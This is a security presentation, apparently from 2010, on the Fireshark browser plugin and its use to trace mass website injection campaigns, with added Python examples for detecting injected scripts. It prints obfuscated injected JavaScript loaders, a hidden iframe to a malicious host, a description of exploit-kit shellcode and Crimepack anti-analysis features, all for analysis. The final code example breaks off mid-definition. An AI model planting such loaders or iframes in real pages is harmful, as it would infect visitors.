Let's start at the beginning...

FIRESHARK

The Fireshark Project

Author: Stephan Chenette

Contributions by: Wladimir Palant (AdBlockPlus FF Plugin)

Organize and analyze malicious website data

Correlate data

- Similar mass injection attacks (C/R/E)
- attacker patterns (providers/content/kits)
The Fireshark Project

Current Status

- 1.0 Release - April 2010 (GPL v3 license)
- 1.1 Release - due in November 2010 (selective beta)
Overview of Fireshark Architecture

Browser Plugin allows automated control of browser

Passively logs information to log file

- Connections (contextual reference)
- Source and DOM content
- JavaScript function calls
- Page Links
- Screen Shot

Your Job: Use post-processing scripts/database to output organized results
Understanding the interweb.

MALICIOUS WEBSCAPE

URL Injection attacks are increasing

225% increase in the number of new compromised legitimate websites in the last 12 months.

Source: Websense Security Labs, State of Internet Security, Q3-Q4 2009 Report

Translation:

There is a large chance that a website you have visited in the recent past served malicious code.
Victims of "Malvertisements" (2009)

- The Drudge Report
- Horoscope.com
- Lyrics.com
- slacker.com
- Eweek.com
- The New York Times
- Philadelphia Inquirer
- Expedia, Rhapsody
Google's Doubleclick Spreads Malicious Ads On Eweek Website

Google's Doubleclick ad network has once again been caught distributing malicious banner displays, this time on the home page of eWeek, the online version of the popular business computing magazine. Unsuspecting end users who browse the site were presented with malvertisements with invisible iframes that redirect them to attack websites, according to researchers at Websense. The redirects use one of two methods to infect users with malware, including rogue anti-virus software.

In one case, a PDF with heavily obscured javascript shunted victims to a subdomain at inside.com. In other scenarios, a generic index.php file did the bidding.
Redirection chains / Mass Compromises

Nine-ball mass-injection

[Figure: redirection chain - Legitimate Site -> Redirector 1 -> Redirector 2 -> Redirector 3 -> Exploit Site, labelled in the example as Infected Site -> mw.kz -> bro.tw -> imi.tw -> ninetoraq.in]

- There is a varied but unique set of hosts involved in the redirection chain
- Any repeat visitor is diverted to ask.com instead of a malicious landing page
- The structure of the injected deobfuscation algorithm is equivalent throughout all the infected sites
compromised website using an iframe

[Figure: one compromised site whose injected iframe connections fan out to other hosts; the figure uses placeholder names another_website0.com through another_website9.com]
compromised website using a redirector

[Figure: Website 1 -> (200) -> Website 2]

Exploit site goes through redirector

[Figure: the same Website 1 -> (200) -> Website 2 chain, now ending at the exploit site]
Exploit Site Serves Rogue Anti-Virus

- XP Security Tool 2010
- XP Defender Pro
- Vista Security Tool 2010
- Vista Defender Pro
Malicious Site Serves - Exploit Kits

[Screenshot: the exploit list from an exploit-kit control panel, partly cut off at the left edge. Legible identifiers in the first column: CVE-2004-1043, CVE-2005-2127, CVE-2005-2265. Legible entries:]

- ByteCode Verifier component flaw in Microsoft VM
- MS05-001 - HTML vulnerabilities
- COM Object Instantiation Memory Corruption (Msdds.dll)
- MFSA2005-50 - Firefox InstallVersion.compareTo
- ...IE/Microsoft Data Access Components (MDAC) R...
- ...ty for Firefox & Opera
- ...ct Cross-Site Scripting (XSS) vulnerability (IE)
- Microsoft XML Core Services Vulnerability
- AOL SuperBuddy ActiveX Control "LinkSBIcons()"
- WinZip FileView ActiveX (IE)
- Apple QuickTime RTSP URI (IE)
- Vector Markup Language Vulnerability (IE)
- Integer overflow in Adobe Flash Player 9
- Yahoo! Messenger Webcam (IE)
- Yahoo! Widgets YDP (IE)
- PDF Exploit - collab.collectEmailInfo
- AOL Radio AmpX Buffer Overflow
- AOL Radio AmpX (AOLMediaPlaybac...)
- MS09-032 DirectX DirectShow (IE)
- PDF Exploit - util.printf
- PDF Exploit - collab.getIcon
- MS09-043 - IE OWC Spreadsheet ActiveX control Memory Corruption
- Integer overflow in the AVM2 abcFile parser in Adobe Flash Player
- Telnet for Opera TN3270
- PDF Exploit - doc.media.newPlayer
- PDF Exploit - LibTIFF Integer Overflow

Malicious Site Serves - Exploit Kits

[Screenshot: continuation of the same exploit list; the remaining rows are not legible]
Crimepack 2.8 released before March 10

Exploits include:

- Adobe Acrobat Reader Exploits (including CVE-2010-0188)
- JRE (GSB & SERIALIZE)
- MDAC (IE)
- MS09-032 (IE)
- MS09-002 (IE)
- CVE-2010-0806 (IE)
Crimepack 2.8 Anti-Analysis

Features include:

1. Undetected by AV Scanners (JavaScript & PDF/JAR/JPG files)
2. Random PDF Obfuscation (Not using static PDF file like other packs)
3. Blacklist checker & AutoChecker
4. Prevent Wepawet, JSunpack and other JavaScript unpackers from decoding your page
Crimepack 2.8 Changes

- Added CVE-2010-0806
- Added CVE-2010-0188
- Added more ip's to block
- Frame generator
- Redirector for non-vulnerable traffic
- New JS cryptor
- Anti-Kaspersky emulation

websense

RECAP OF NEEDS: Track and Organize

Organize and analyze malicious website data

Correlate data

- Similar mass injection attacks (C/R/E)
- attacker patterns (providers/content/kits)
Current Resources

Websites:

- Wepawet
- Anubis
- ZeusTracker
- BLADE (*new*)
- Robtex
- Unmask Parasites
- Malwaredomainlist.com
- Badwarebusters.org
- VirusTotal.com
- Etc.

Tools:

- Malzilla
- Rhino Debugger
- FF JavaScript Deobfuscator
- DS's SpiderMonkey
- Jsunpack
- Caffeine Monkey
- NJS
- Etc.
Malzilla V.S. The Phoenix Exploit Kit

[Screenshot: Malzilla's Decoder tab loaded with the Phoenix exploit kit page. The script body is a dense block of obfuscated character data; "Run script" (with the "Replace eval() with" option) ends with the status message "Script can't be compiled"]

[Screenshot: a second attempt in a new Malzilla tab on the same obfuscated script, again ending in "Script can't be compiled"]
JSUNPACK V.S. The Phoenix Exploit Kit

[Screenshot: the jsunpack submission page - "JSUNPACK, A Generic JavaScript Unpacker"; "Enter a single URL (or paste JavaScript to decode)"; upload a PDF, pcap, HTML or JavaScript file; recent submissions list]

JSUNPACK V.S. The Phoenix Exploit Kit

ERROR: CAN NOT FULLY DECODE

[Screenshot: the jsunpack result for the Phoenix index.php - "Analysis Completed"; "info: [decodingLevel=0] found JavaScript"; the extracted script is still obfuscated character data]
Spidermonkey/ CaffeineMonkey

JavaScript Engine + Limited browser features

schenette@ssdstretl:~/js$ js
js> eval
function eval() {
    [native code]
}
js> window.location.search
typein:2: ReferenceError: window is not defined
Emulation -> Implementation is behind

document.body is undefined
document.title is undefined
document.forms is undefined
document.documentElement is undefined
document.URL is undefined
document.getElementsByTagName is not a function

Emulation -> Implementation is behind

window.location.search
window.addEvent is not a function
window.onDomReady is not a function
window.parent is undefined
window.screen is undefined
window.top is undefined
screen is not defined
top is not defined
parent is not defined
self is not defined
location.protocol
When an alternative just won't do...

INTRODUCTION

Why do we need Fireshark?

Researcher / Network Administrator / Penetration Tester

We need tools to analyze mass injection attacks

- Website Architecture/Redirection Chains
- Source / Changes to DOM / JavaScript function calls
- Content Profiling / Screen shot

Using an organized and ultimately VISUAL approach
List view V.S. Graph view

[Screenshot: list view - a Fiddler-style Web Sessions table (#, Result, Protocol, Host, URL) listing dozens of HTTP 304/200 responses for one host's skin images, CSS and popup files]

List view V.S. Graph view

[Screenshot: the same sessions as a graph view - nodes for the crawled site and the hosts it connects to; the figure uses placeholder names another_website0.com through another_website8.com]
Architecture of youtube.com

[Figure: connection graph of youtube.com - www.youtube.com at the centre with 200 responses from s0.2mdn.net, ad-g.doubleclick.net, i1.ytimg.com, i2.ytimg.com, i3.ytimg.com, i4.ytimg.com, s.ytimg.com and csi.gstatic.com]
horoscope.com (Content responsibility)

[Bar chart: No. Ingress Connections per host - overlapping labels clicksor.com, eastmoney.com, mobile-de..., homesalesplus.ru, then www.google-analytics.com, tobeyeu.com, www.google.com, googleads.g.doubleclick.net, 93.186.127.49, pagead2.googlesyndication.com, hindger.com, rascop.com, sodanthu.com, aponith.com, purgand.com, www.gunentha.com, www.bluehost.com, 58centptr.com, www.sedoparking.com, onlinesertepkos.com, 12s83.com, ad.wz.cz, ext.tyroo.com]
Original Source code (Phoenix pack)

[Screenshot: the page source served by the Phoenix pack - a single dense block of obfuscated characters with no readable JavaScript]
DOM result (Phoenix pack)

[Screenshot: the same page after deobfuscation, as captured from the DOM - now readable JavaScript: a FLASHSPRAY() function that drives a "BridgeMovie" Flash object, a GFLASH() function that reads navigator.plugins["Shockwave Flash"].description to pick the Flash player version and falls back to PDF() when Flash is absent, a RUNJAVA() function that injects <applet> elements (archive='files/des.jar' with a 'data' parameter, and a second applet carrying 'sc' and 'np' parameters), and a long hexadecimal ShellCode string whose bytes spell out the Windows API names GetTempPathA, LoadLibraryA, GetProcAddress and WinExec]
How to use Fireshark 1.0

- Install Fireshark Firefox plugin (.xpi file)
- Create data.txt file, place in your home directory
- Tools->Go! (then go and get a cup of coffee)

** Reportlog.yml **

Use post-processing scripts

- FiresharkInitInfo.pl (must be run first)
- GraphViz.pl
- IngressEgress.pl
Post-Run Analysis / data correlation

Log is analyzed manually or automatically via post-analysis correlation process
[Screenshot: the Firefox Tools menu, where Fireshark's Go! entry lives, beside a directory listing of the generated log files with their modified dates]
Use cases...

DOWN THE RABBIT HOLE

Down the Rabbit hole

Analysis of Three exemplary Injection campaigns

- Injection campaigns occur daily
- A breadth view analysis
- Gain a better understanding of the malicious webscape
- Use Fireshark to do it.

Down the Rabbit hole

- Injection Example #1
Injection Example #1

13k matches/24hrs

[Screenshot: the tail of an infected page's HTML. After </center></body></html> an injected <script> block follows, of this shape (the string literals are padded with punctuation that the .replace() calls strip at run time and are not legible in the screenshot):]

<script>/*GNU GPL*/ try {window.onload = function (){var Xfjgsl7uq8wh7d =
document.createElement('[padded "script"]'.replace(/.../ig,
''));Xfjgsl7uq8wh7d.setAttribute('type',
'text/javascript');Xfjgsl7uq8wh7d.setAttribute('src', '[padded URL]'.replace(/.../ig,
''));Xfjgsl7uq8wh7d.setAttribute('defer',
'defer');Xfjgsl7uq8wh7d.setAttribute('id', '[padded id]'.replace(/.../ig,
''));document.body.appendChild(Xfjgsl7uq8wh7d);}}catch(e){}</script>
Injection Example #1

Step 1) Analyze a subset (500/13k)

Breadth

- Popular campaign will emerge
- Injections into unique websites will lead to same hosts

Depth

- Details of the attack
- Screen Shots
- Source code, Deobfuscated DOM, Network traffic
Bird's Eye View of 500/13k

[Bar chart: Popularity of Requests - No. Ingress Connections per host for the 500 analyzed pages: overlapping labels clicksor.com, eastmoney.com, mobile-de..., homesalesplus.ru, then www.google-analytics.com, tobeyeu.com, www.google.com, googleads.g.doubleclick.net, 93.186.127.49, pagead2.googlesyndication.com, hindger.com, rascop.com, sodanthu.com, aponith.com, purgand.com, www.gunentha.com, www.bluehost.com, 58centptr.com, www.sedoparking.com, onlinesertepkos.com, 12s83.com, ad.wz.cz, ext.tyroo.com]
[Bar chart: the same Popularity of Requests / No. Ingress Connections chart shown full-screen]
[Bar chart: Popularity of Requests / No. Ingress Connections, with the bar for 93.186.127.49 called out]
Down the Rabbit hole

Injection Campaign #1: 93.186.127.49
"93.186" Injection Campaign

[Figure: connection graph for the 93.186 campaign - nodes ajax.googleapis.com (200), amasaki.info (200) and niruj.com, joined by 302 redirects]
"93.186" Injection Campaign

[Screenshot: the rogue anti-virus landing page reached at the end of the chain - a fake "scan in progress" window claiming that malware on the computer gathers information and sends it to its creator]
Observations from attack
Rascop.com...a familiar foe?

[Figure: connection graph - rascop.com alongside ajax.googleapis.com (200), a 302 redirect to amasaki.info (200), niruj.com and hindger.com]
Infamous Rascop.com

rascop.com = NXD (Feb '10)

Waledac

Fast-flux domain
Rascop.com and friends gone but landing pages here to stay

- Waledac domains were NXD in the takedown
- Landing pages were still online though

[Bar chart: the No. Ingress Connections chart again, with hindger.com, rascop.com and sodanthu.com grouped together]
Injection Example #2

Popularity of Requests

250/5k URLs lead to homesalesplus.ru

[Bar chart: No. Ingress Connections per host for the Example #2 set - overlapping labels clicksor.com, eastmoney.com, mobile-de..., homesalesplus.ru, then www.google-analytics.com, tobeyeu.com, www.google.com, googleads.g.doubleclick.net, 93.186.127.49, pagead2.googlesyndication.com, hindger.com, rascop.com, sodanthu.com, aponith.com, purgand.com, www.gunentha.com, www.bluehost.com, 58centptr.com, www.sedoparking.com, onlinesertepkos.com, 12s83.com, ad.wz.cz, ext.tyroo.com]
Popularity of connections

250/5k URLs lead to homesalesplus.ru

[Bar chart: a wider view of the same Example #2 data; legible additional hosts include googleads.g.doubleclick.net, onlinesertepkos.com, ad.wz.cz, nefa.us, 4analytics.org, 2analytics.us, kiko.lacoctelera.net, www.youtube.com, counter.yadro.ru and s7.addthis.com]
Injected Code Variation #1

<script> /*CODE1*/ try {window.onload = function(){var
Q236s4ic4454clw = document.createElement
('script');Q236s4ic4454clw.setAttribute('type',
'text/javascript');Q236s4ic4454clw.setAttribute('id',
'myscript1');Q236s4ic4454clw.setAttribute('src', 'h(t)!
[src value: a URL padded with ( ) ! & # $ @ ^ characters, illegible in the screenshot]
'.replace(/\(|\!|&|#|\$|\)|@|\^/ig,
''));Q236s4ic4454clw.setAttribute('defer',
'defer');document.body.appendChild(Q236s4ic4454clw);}}
catch(e){}</script>
</textarea></form>
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Injected Code Variation #2

<script>/*LGPL*/ try { window.onload = function(){
  var Kdxcthy92mqwy = document.createElement('[noise-padded "script", illegible in the scan]'.replace(/\(|\!|#|\$|\^|\)|&|@/ig, ''));
  Kdxcthy92mqwy.setAttribute('defer', '[noise-padded "defer"]'.replace(/[similar alternation]/ig, ''));
  Kdxcthy92mqwy.setAttribute('type', '[noise-padded "text/javascript"]'.replace(/[similar alternation]/ig, ''));
  Kdxcthy92mqwy.setAttribute('id', '[noise-padded id value, illegible]'.replace(/[similar alternation]/ig, ''));
  Kdxcthy92mqwy.setAttribute('src', '[noise-padded URL, illegible in the scan]'.replace(/[similar alternation]/ig, ''));
  if (document) { document.body.appendChild(Kdxcthy92mqwy); }
}} catch (Hgsusm4sqb4eveekzkh) {}</script>
<!-- e3d7fda78c66a21182b6e8f6bf4df79a -->
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Injected Code Variation #3

/*GNU GPL*/ try { window.onload = function(){
  var A84jbd5xsu = document.createElement('script');
  A84jbd5xsu.setAttribute('type', 'text/javascript');
  A84jbd5xsu.setAttribute('id', 'myscript1');
  A84jbd5xsu.setAttribute('src', 'h^&(t)$t(!^p(...[noise-padded URL, illegible in the scan]...'.replace(/@|\^|[further alternatives illegible]/ig, ''));
  A84jbd5xsu.setAttribute('defer', 'defer');
  document.body.appendChild(A84jbd5xsu);
}} catch(e)
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Depth - Diff DOM/SRC

[Screenshot of the source/DOM diff view: "Difference 145 of 145", cursor at Col 1155/1222. The highlighted DOM line, cut off at the right edge of the screenshot, reads:]
<script type="text/javascript" id="myscript1" src="http://clicksor-com.eastmoney.com.mobile-de.homesa
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Depth - Script link in DOM

[Screenshot of the same diff view with the injected script link selected: "Difference 145 of 145", Col 1/837 and Col 1155/1222. The highlighted DOM line, cut off at the right edge of the screenshot, reads:]
<script type="text/javascript" id="myscript1" src="http://clicksor-com.eastmoney.com.mobile-de.homesa
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DOM View

DOM ==> Mutable memory representation
(Final view of the DOM after JS/events)

<script type="text/javascript" id="myscript1"
src="http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/"
defer="defer"></script>
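The DOM View slide shows why Fireshark logs both the served source and the final DOM: the injected loader leaves no <script src=...> in the source, but the element it creates at run time is in the DOM. The following is an added example, not code from the Fireshark project or from this presentation, of the source-versus-DOM comparison that surfaces such run-time script elements. The two HTML documents are constructed to mirror the slide (example.com stands in for the compromised page's own host); the function names are this example's own.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Record (src, id, type) for every <script> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self.scripts.append((a.get("src"), a.get("id"), a.get("type")))


def scripts_in(html):
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts


def dom_only_scripts(source_html, dom_html):
    """Script elements in the final DOM that the served source never contained.
    Those were created at run time, which is exactly what the injected
    window.onload loaders on the preceding slides do."""
    served = set(scripts_in(source_html))
    return [s for s in scripts_in(dom_html) if s not in served]


def foreign_script_hosts(dom_html, page_host):
    """Hosts of external scripts in the DOM that differ from the page's own host."""
    hosts = set()
    for src, _id, _type in scripts_in(dom_html):
        if src:
            h = urlsplit(src).hostname
            if h and h != page_host:
                hosts.add(h)
    return sorted(hosts)


# Constructed sample (not a capture): the served source carries the page's own
# script plus the obfuscated loader; the final DOM additionally contains the
# element the loader created, as shown on the DOM View slide.
SOURCE_HTML = (
    '<html><head><script src="http://www.example.com/js/site.js"></script></head>'
    '<body><p>page</p>'
    '<script>/*CODE1*/try{window.onload=function(){/* loader body omitted */}}catch(e){}</script>'
    '</body></html>'
)
INJECTED_SRC = ("http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/"
                "ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/")
DOM_HTML = SOURCE_HTML.replace(
    "</body>",
    '<script type="text/javascript" id="myscript1" src="%s" defer="defer"></script></body>'
    % INJECTED_SRC,
)

if __name__ == "__main__":
    for s in dom_only_scripts(SOURCE_HTML, DOM_HTML):
        print("run-time script:", s)
    print("foreign hosts:", foreign_script_hosts(DOM_HTML, "www.example.com"))
```

Comparing parsed script elements rather than raw text keeps the check insensitive to the whitespace and attribute-order differences that make a plain textual diff of source and DOM (like the "145 differences" on the Depth slides) noisy.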
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Log Analysis

Further analysis showed variations:

1. hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/

2. hxxp://chip-de.ggpht.com.deezer-com.viewhomesale.ru:8080/google.com/google.com/timeanddate.com/avg.com/zshare.net/
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ru:8080 URL Injection Campaign

Similarities between infected sites:

- Port 8080

- Various changing .ru domains

- Legitimate content on port 80 served by Apache

- Malicious domains are mapped to 5 different IPs

- Malicious IP addresses are on hosting providers Leaseweb (Netherlands) and OVH.com (France)

- Landing domains were NXD (NXDOMAIN) Dec '09 / Jan '10
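The traits listed above (port 8080, a changing .ru registered domain, brand-like subdomain labels such as clicksor-com and mobile-de, and a path made of legitimate domain names) can be checked mechanically over the URLs in a Fireshark log. The following is an added example, not code from the Fireshark project or this presentation; the indicator names, the threshold and the helper functions are this example's own, and the inputs are the two landing URLs from the Log Analysis slide plus a benign control on the reserved example.com domain.

```python
import re
from urllib.parse import urlsplit

# Constructed input: the two landing URLs from the Log Analysis slide (defanged as on
# the slide) plus a benign control on the reserved example.com domain.
SAMPLE_URLS = [
    "hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/"
    "ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/",
    "hxxp://chip-de.ggpht.com.deezer-com.viewhomesale.ru:8080/"
    "google.com/google.com/timeanddate.com/avg.com/zshare.net/",
    "http://www.example.com/news/index.html",
]

# A label such as clicksor-com or mobile-de imitates a well-known domain with its dot
# replaced by a hyphen; the real registered domain is the trailing .ru name.
MIMIC_LABEL = re.compile(r"^[a-z0-9]+-(com|net|org|de|ru|jp|cn|co|uk|us)$")
# A path segment that is itself a domain name (ocn.ne.jp, google.com, ...).
DOMAIN_LIKE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)*\.(com|net|org|de|ru|jp|cn|uk|us)$")


def split_url(url):
    """Normalise the defanged hxxp:// scheme so urlsplit parses the netloc."""
    u = urlsplit(url.replace("hxxp://", "http://", 1))
    port = u.port or (443 if u.scheme == "https" else 80)
    return (u.hostname or ""), port, u.path


def registered_domain(host):
    """Last two labels: adequate for the hosts on these slides (no public-suffix list)."""
    return ".".join(host.split(".")[-2:])


def campaign_indicators(url):
    """Return the ru:8080 campaign traits a URL exhibits (indicator names are this
    example's own, not Fireshark output)."""
    host, port, path = split_url(url)
    labels = host.split(".")
    found = []
    if port == 8080:
        found.append("port-8080")
    if labels[-1] == "ru":
        found.append("ru-tld")
    mimics = [lab for lab in labels[:-2] if MIMIC_LABEL.match(lab)]
    if mimics:
        found.append("brand-mimic-labels=" + ",".join(mimics))
    if len(labels) >= 5:
        found.append("deep-subdomain")
    if sum(1 for seg in path.split("/") if DOMAIN_LIKE.match(seg)) >= 2:
        found.append("domain-names-in-path")
    return found


def is_campaign_url(url, threshold=3):
    """Flag when at least `threshold` traits coincide (threshold is an assumption)."""
    return len(campaign_indicators(url)) >= threshold


def ru_landing_domains(urls):
    """Distinct .ru registered domains: the part of the URL that kept changing."""
    return sorted({registered_domain(split_url(u)[0])
                   for u in urls if "ru-tld" in campaign_indicators(u)})


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(is_campaign_url(u), campaign_indicators(u))
    print("landing domains:", ru_landing_domains(SAMPLE_URLS))
```

No single trait is conclusive (plenty of legitimate services listen on 8080, and .ru is a large TLD), which is why the check counts coinciding traits rather than matching any one of them; tracking the distinct registered .ru domains over time is what exposes the "various changing .ru domains" behaviour across a log.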
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The Never-ending story 



Fresh injections 
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Observations from ru:8080 attack

Compromised websites can be, and are, updated automatically

Compromised websites are injected with multiple redirectors

Sharing of stolen FTP credentials

e.g. many infected sites also led to Gumblar-infected domains, indicating that attackers perhaps had shared stolen FTP credentials
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Injection Example #3

Mass Injection #3

~5700 infected pages

~5300 unique hosts... sent 1k for analysis

[First chunk: a <script> assembled from percent-encoded string pieces ("%3d%72%2e%73%75..." + "..." + ...), largely illegible in the scan.] ...));</script></HEAD>
<BODY LANG="en-GB" DIR="LTR"><script>c01z635=''; r7c64baee9='r5e251'; r...='r652d7'; r03bdal6e7bb=[illegible];
[illegible] = String.constructor.prototype.[illegible];
rNEW = Object.constructor.prototype.mama;

if (r7c64baee9+c01z635+rNEW=='r5e251r652d7') { r52ae0c6258 = r03bdal6e7bb };
r52ae0c6258.write('<scr'+'ipt>function r5e7c65(r0ea26){ return e'+c01z635+'val(r0ea26); }</scr'+'ipt>');
function c0127c4b23r0116d(r8b3a0d){ var z3e7=''; return (r5e7c65('parse'+z3e7+'Int'))(r8b3a0d,16); }
function [illegible](r1713...){ var ra268cb52a4=''; ra9739f3='fromCh'; rf95b4=String[ra9739f3+'arC'+'ode'];
  for (raec264=0; raec264<r1713....length; raec264+=2) {
    ra268cb52a4 += rf95b4(c0127c4b23r0116d(r1713....substr(raec264,2)));
  }
  return ra268cb52a4;
}
var rfdd37='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B7661'+
[remaining hex pieces illegible in the scan]
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Breadth - Popularity of Responses

[Screenshot of the response-popularity view; most entries are illegible in the scan. Legible entries include www.yahoo.com, uk.yahoo.com, www.google.com and sportgun.pl.ua.]

sportgun.pl.ua: a very common type of attack; it sends a response back to 50+ hosts
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Connection Request / No Response

Src: hxxp://sportgun.pl.ua/st/go.php?sid=2&

Dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php

[Connection graph; legible nodes: howtofindmyip.com (302), uplevelgmno.vn.ua.]
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Round #2 Connection Request / Response

Success!

[Connection graph; legible nodes: mm.chitika.net, howtofindmyip.com (200), uplevelgmno.vn.ua, scripts.chitika.net.]
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Fetches Exploits

Fetches PDF and Java exploits

connection:
type: response
src: hxxp://uplevelgmno.vn.ua/111/sv777/pdf.php
dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php
status: 200

connection:
type: response
src: hxxp://uplevelgmno.vn.ua/111/sv777/dev.s.AdgredY.class
dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php
status: 200
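The "connection:" records above are the raw material for the three views the Breadth and Connection Request/Response slides show: which responders serve the most hosts, which requests never get a response, and the chain of hosts from landing page to exploit server. The following is an added example, not code from the Fireshark project or this presentation, of a post-processing script over such records. The log excerpt is constructed from the hosts on the slides (plus a reserved example name for an unanswered request); the direction convention in requester_and_resource is this example's reading of the slides, stated as an assumption, and all function names are its own.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed excerpt in the "connection:" record shape from the Fetches Exploits slide.
# Not a real Fireshark log: the hosts are the slides' own, the order of events is
# reconstructed from the Connection Request/Response slides, and redirector.example
# (a reserved name) is added to show a request that never receives a response.
SAMPLE_LOG = """\
connection:
type: request
src: hxxp://howtofindmyip.com/
dst: hxxp://sportgun.pl.ua/st/go.php?sid=2&
connection:
type: response
src: hxxp://sportgun.pl.ua/st/go.php?sid=2&
dst: hxxp://howtofindmyip.com/
status: 302
connection:
type: request
src: hxxp://sportgun.pl.ua/st/go.php?sid=2&
dst: hxxp://redirector.example/go
connection:
type: request
src: hxxp://sportgun.pl.ua/st/go.php?sid=2&
dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php
connection:
type: response
src: hxxp://uplevelgmno.vn.ua/111/sv777/index.php
dst: hxxp://sportgun.pl.ua/st/go.php?sid=2&
status: 200
connection:
type: response
src: hxxp://uplevelgmno.vn.ua/111/sv777/pdf.php
dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php
status: 200
connection:
type: response
src: hxxp://uplevelgmno.vn.ua/111/sv777/dev.s.AdgredY.class
dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php
status: 200
"""


def parse_log(text):
    """Turn the flat key: value blocks into dicts, one per 'connection:' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "connection:":
            cur = {}
            records.append(cur)
        elif cur is not None:
            key, _, value = line.partition(":")
            cur[key.strip()] = value.strip()
    return records


def host_of(url):
    return urlsplit(url.replace("hxxp://", "http://", 1)).hostname or ""


def requester_and_resource(rec):
    """(requesting page, fetched resource). Assumption from the slides: a request lists
    requester/target as src/dst, a response lists responder/requester as src/dst."""
    if rec.get("type") == "response":
        return rec["dst"], rec["src"]
    return rec["src"], rec["dst"]


def responder_popularity(records):
    """Distinct requester hosts each responding host served (the 'breadth' view)."""
    served = defaultdict(set)
    for rec in records:
        if rec.get("type") == "response":
            served[host_of(rec["src"])].add(host_of(rec["dst"]))
    return {h: len(s) for h, s in served.items()}


def unanswered_requests(records):
    """Requests with no response flowing back on the same pair of URLs."""
    answered = {(r["dst"], r["src"]) for r in records if r.get("type") == "response"}
    return [r["dst"] for r in records
            if r.get("type") == "request" and (r["src"], r["dst"]) not in answered]


def fetched_by(records, page_url):
    """Everything a page pulled in, e.g. the PDF and Java class behind index.php."""
    out = set()
    for rec in records:
        page, resource = requester_and_resource(rec)
        if page == page_url and resource != page_url:
            out.add(resource)
    return sorted(out)


def host_chain(records, start_host):
    """Host-level redirection chain, following answered fetches only."""
    hops = defaultdict(list)
    for rec in records:
        if rec.get("type") == "response":
            page, resource = requester_and_resource(rec)
            if host_of(page) != host_of(resource):
                hops[host_of(page)].append(host_of(resource))
    chain = [start_host]
    while True:
        nxt = [h for h in hops.get(chain[-1], []) if h not in chain]
        if not nxt:
            return chain
        chain.append(nxt[0])
```

Building the chain from answered responses only is deliberate: a redirector that is probing several next hops (the "No Response" round on the earlier slide) would otherwise pull dead branches into the chain, while the unanswered requests are still worth reporting separately because they reveal the redundant redirectors the attackers keep in reserve.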
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PDF VirusTotal Results

[VirusTotal report screenshot]

VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware detected by antivirus engines. More information...

File [name illegible] received on 2010.02.22 20:25:36 (UTC)
Current status: finished
Result: 9/41 (21.95%)

Name | Description | Reference
Adobe Collab overflow | Multiple Adobe Reader and Acrobat buffer overflows | CVE-2007-5659
[...] overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992
Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927
Doc.media.newPlayer | Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through [version cut off] | CVE-2009-4324

Eleonore Exploits Pack

hxxp://uplevelgmno.vn.ua/111/sv777/stat.php

<body id="gordcmrac-com" class="hcxtepage">
<div id="wrapper-a">
<div id="wrapper-b">
<div id="heading">

<h1><a href="#">Exploit PAck</a></h1>
<h2>Exploit pack</h2>

<p id="heading-intro">
Eleonore Exploits pack version 1.3.2<br>
Please enter your login and password.
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Obfuscated Chunk in Source Code

howtofindmyip.com obfuscation

<script>eval(unescape("%..."+"%..."+ ... [percent-encoded string pieces, illegible in the scan] ... +"5%3b"));</script>
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Deobfuscated DOM

howtofindmyip.com deobfuscated

[The decoded script is again illegible in the scan except for its tail, which contains Math.round(Math.random()...) and writes this hidden iframe:]

<iframe height="315" width="679" style="visibility: hidden;" src="http://sportgun.pl.ua/st/go.php?sid=2&" name="c01"></iframe>
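The loaders on the Injected Code Variation #1-#3, Injection Example #3 and howtofindmyip.com slides each hide their strings in a different way: noise characters that the script's own .replace() strips, hex pairs fed to String.fromCharCode(parseInt(x, 16)), and percent-encoded pieces concatenated into unescape(). None of them needs a JavaScript engine to undo: the encoding parameters are in the script text, so a log post-processor can recover the injected URL or iframe statically. The following is an added example, not code from the Fireshark project or this presentation, with one decoder per trick. The samples are constructed: the Variation #1 sample is built from the URL on the DOM View slide, the hex literal is the one on the Injection Example #3 slide with two OCR misreads corrected, and the unescape sample encodes the iframe from the Deobfuscated DOM slide; all function and constant names are this example's own.

```python
import re

# Static decoders for the three string-encoding tricks used by the injected loaders on
# the slides. Added example, not Fireshark code; every sample below is constructed.

# 'noisy literal'.replace(/\(|\!|&|.../ig, '') : apply the script's own regex to its
# own literal instead of letting a browser execute it.
JS_REPLACE_RE = re.compile(
    r"'(?P<lit>[^']*)'\s*\.replace\(\s*/(?P<pat>[^/]+)/(?P<flags>[a-z]*)\s*,\s*''\s*\)")


def decode_replace_strip(script_text):
    out = []
    for m in JS_REPLACE_RE.finditer(script_text):
        flags = re.I if "i" in m.group("flags") else 0
        out.append(re.sub(m.group("pat"), "", m.group("lit"), flags=flags))
    return out


# Hex-pair strings fed two characters at a time to String.fromCharCode(parseInt(x, 16)).
HEX_LIT_RE = re.compile(r"'((?:[0-9A-Fa-f]{2}){4,})'")


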